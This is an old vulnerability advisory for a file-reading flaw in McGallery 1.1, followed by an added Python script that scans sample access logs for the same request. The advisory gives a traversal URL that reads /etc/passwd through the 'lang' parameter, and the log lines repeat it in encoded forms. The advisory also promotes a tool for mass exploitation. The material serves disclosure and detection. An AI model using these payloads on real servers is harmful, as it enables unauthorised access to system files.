ID PACKETSTORM:38178 Type packetstorm Reporter d_bug Modified 2005-06-21T00:00:00
Description
`Vendor: Phpforum, http://www.phpforums.net/
Product: McGallery v 1.1
Vulnerability: reading files on disk
Consequences: Web server paths are opened
Risk: High
Description: An attacker can form the query in URL form and get access to the system files
Example: http://example.com/mcgallery/admin.php?lang=../../../../../../etc/passwd
Discovered by D_BuG d_bug@bk.ru
NemesisSecurityTeam
http://nemesisoftware.com/
CheckZond free v. 1.0 http://nemesisoftware.com/products.htm
uses the vulnerabilities above for automatic vulnerability search (Google Hacking technique) and usage.
--
Best regards,
D_BuG mailto:d_bug@bk.ru
`
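A log-review check for the request shape shown in the advisory's example, added here and not part of the original advisory or of McGallery: it flags `lang` values sent to `admin.php` that contain `..` segments or absolute paths, and goes beyond the literal example by normalising percent-encoded and double-encoded forms first. The log lines, client addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed access-log lines (common log format), not taken from a real server.
SAMPLE_LOG = """\
203.0.113.5 - - [21/Jun/2005:10:00:01 +0000] "GET /mcgallery/admin.php?lang=english HTTP/1.1" 200 5120
203.0.113.9 - - [21/Jun/2005:10:00:07 +0000] "GET /mcgallery/admin.php?lang=../../../../../../etc/passwd HTTP/1.1" 200 1833
203.0.113.9 - - [21/Jun/2005:10:00:09 +0000] "GET /mcgallery/admin.php?lang=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1833
203.0.113.9 - - [21/Jun/2005:10:00:12 +0000] "GET /mcgallery/admin.php?lang=..%252f..%252fetc%252fpasswd HTTP/1.1" 404 210
203.0.113.7 - - [21/Jun/2005:10:00:15 +0000] "GET /mcgallery/index.php?page=2 HTTP/1.1" 200 4410
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so double-encoded input is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(value):
    """True if the value contains a '..' segment or is an absolute path."""
    path = fully_decode(value).replace("\\", "/")
    return path.startswith("/") or ".." in path.split("/")

def find_lang_traversal(log_text, script="admin.php", param="lang"):
    """Return (client, status, decoded value) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/" + script):
            continue
        # parse_qsl decodes once; fully_decode handles any further layers.
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key == param and is_traversal(value):
                hits.append((client, int(status), fully_decode(value)))
    return hits

if __name__ == "__main__":
    for hit in find_lang_traversal(SAMPLE_LOG):
        print(hit)
```

Hits answered with status 200 are the ones to triage first, since the server returned a body for the request.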